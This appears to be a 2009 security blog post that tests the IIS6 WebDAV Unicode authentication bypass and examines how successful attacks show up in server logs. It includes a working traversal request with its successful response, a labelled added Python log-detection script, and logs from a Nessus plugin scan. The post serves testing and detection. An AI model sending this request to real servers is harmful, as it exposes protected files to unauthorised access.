Tuesday, May 19, 2009

Log Results of Successful IIS6 WebDAV Zero Day Attacks

I covered this a bit in my DarkReading blog but wanted to continue with my testing tonight to see what else I could find out. Plus, there are some new tool updates such as an auxiliary module for Metasploit and a plugin for Nessus.

There was an interesting follow-up to the DR blog on whether or not Microsoft Outlook Web Access was vulnerable. I don't have hands-on access to an OWA box but I hope to do some more testing on Tues.

What prompted me to write this post was an interesting finding raised in the correspondence regarding the logs: a reader was wondering why the Unicode attacks were not showing up in them. Let's start with what my telnet test looks like, followed by some example log entries and then my speculation as to the answer.
metasploit jsawyer$ telnet 192.168.43.128 80
Trying 192.168.43.128...
Connected to 192.168.43.128.
Escape character is '^]'.
GET /..%c0%af/admin/test.txt HTTP/1.1
Translate: f
Connection: close
Host: 192.168.43.128

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 May 2009 04:42:20 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/plain
Content-Length: 7
ETag: "ffbac9af6d7c91:1e1"
Last-Modified: Mon, 18 May 2009 20:20:09 GMT
Accept-Ranges: bytes

pwnage!
Telnet success:
2009-05-19 04:42:20 W3SVC1 192.168.43.128 GET /../admin/test.txt - 80 - 192.168.43.1 - 200 0 0
Metasploit finding the protected admin dir:
2009-05-19 04:33:12 W3SVC1 192.168.43.128 PROPFIND /admin/ - 80 - 192.168.43.1 - 401 2 2148074254
2009-05-19 04:33:13 W3SVC1 192.168.43.128 PROPFIND /admin/ - 80 - 192.168.43.1 - 207 0 0
As you can see in the successful telnet log entry above, the %c0%af is removed. I suspect the issue is due to how the WebDAV DLL is handling the request and that the logging occurs after the request is handled. It would make sense, since the log has to accurately reflect the proper HTTP code. In this case, the vulnerable WebDAV function removes the Unicode, responds with the requested file, and IIS then logs the request.
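Because the overlong sequence never reaches the log, a detection rule has to key on what does get logged: a ".." segment that survived into cs-uri-stem with a 2xx status, and the PROPFIND 401-then-207 pair with no authenticated username. The script below is an added example (not from the original post) that runs those two checks over the post's own log entries; it assumes the default IIS6 W3C field order shown above and a constructed 60-second pairing window.

```python
import re
from datetime import datetime

# Default IIS6 W3C extended field order, matching the lines quoted in the post.
FIELDS = ("date time sitename s_ip method uri_stem uri_query port username "
          "c_ip user_agent status substatus win32").split()

# Constructed sample: the findings quoted in the post plus one benign request.
SAMPLE_LOG = """\
2009-05-19 04:33:12 W3SVC1 192.168.43.128 PROPFIND /admin/ - 80 - 192.168.43.1 - 401 2 2148074254
2009-05-19 04:33:13 W3SVC1 192.168.43.128 PROPFIND /admin/ - 80 - 192.168.43.1 - 207 0 0
2009-05-19 04:40:00 W3SVC1 192.168.43.128 GET /index.htm - 80 - 192.168.43.1 - 200 0 0
2009-05-19 04:42:20 W3SVC1 192.168.43.128 GET /../admin/test.txt - 80 - 192.168.43.1 - 200 0 0
"""

# A ".." segment still present in the *logged* stem. IIS writes the entry after
# WebDAV has collapsed %c0%af to "/", so the raw bytes are never in the log and
# a signature on "%c0%af" would miss every successful request.
DOTDOT = re.compile(r"(^|/)\.\.(/|$)")
BYPASS_WINDOW_SECONDS = 60  # assumed window for pairing the 401 with the 2xx


def parse_w3c(text):
    """Yield one dict per log line; comment lines and malformed lines are skipped."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != len(FIELDS):
            continue
        rec = dict(zip(FIELDS, parts))
        rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        yield rec


def find_webdav_abuse(text):
    """Return (time, client, stem, reason) tuples that warrant a look."""
    hits = []
    last_401 = {}  # (client ip, stem) -> timestamp of the latest PROPFIND 401
    for r in parse_w3c(text):
        key = (r["c_ip"], r["uri_stem"])
        if DOTDOT.search(r["uri_stem"]) and r["status"].startswith("2"):
            hits.append((r["time"], r["c_ip"], r["uri_stem"], "traversal in logged stem served 2xx"))
        if r["method"] == "PROPFIND" and r["status"] == "401":
            last_401[key] = r["ts"]
        elif (r["method"] == "PROPFIND" and r["status"].startswith("2")
              and r["username"] == "-" and key in last_401
              and (r["ts"] - last_401[key]).total_seconds() <= BYPASS_WINDOW_SECONDS):
            hits.append((r["time"], r["c_ip"], r["uri_stem"], "PROPFIND 401 then unauthenticated 2xx on same path"))
    return hits
```

The unauthenticated-username condition is what separates the bypass from a legitimate client retrying with credentials, which would populate cs-username on the second request.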

That's all I've got for now. It's nearing 2am and I'm starting to wane...

Yeah, can't sleep, so here are some logs from an Apache server hit by a Nessus scan with the new plugin. I'll test it against an IIS server in the morning.
- - [19/May/2009:02:04:48 -0400] "GET / HTTP/1.0" 200 45 "-" "-"
- - [19/May/2009:02:04:49 -0400] "GET / HTTP/1.0" 200 45 "-" "-"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "-"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "-"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /login.htm HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /intruvert/jsp/admin/Login.jsp HTTP/1.1" 404 348 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.75 [en] (X11; U; Nessus)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /ControlManager/default.htm HTTP/1.1" 404 345 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /MSWSMTP/Common/Authentication/Logon.aspx HTTP/1.1" 404 359 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /commoncgi/servlet/CCGIServlet?ApHost=PDT_InterScan_NT&CGIAlias=PDT_InterScan_NT&File=logout.htm HTTP/1.1" 404 348 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.html HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.cgi HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.sh HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.pl HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.inc HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.shtml HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.asp HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.php HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.php3 HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.cfm HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.html HTTP/1.1" 404 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.cgi HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.sh HTTP/1.1" 404 342 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.pl HTTP/1.1" 404 342 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.inc HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.shtml HTTP/1.1" 404 345 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.php HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.php3 HTTP/1.1" 404 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.cfm HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
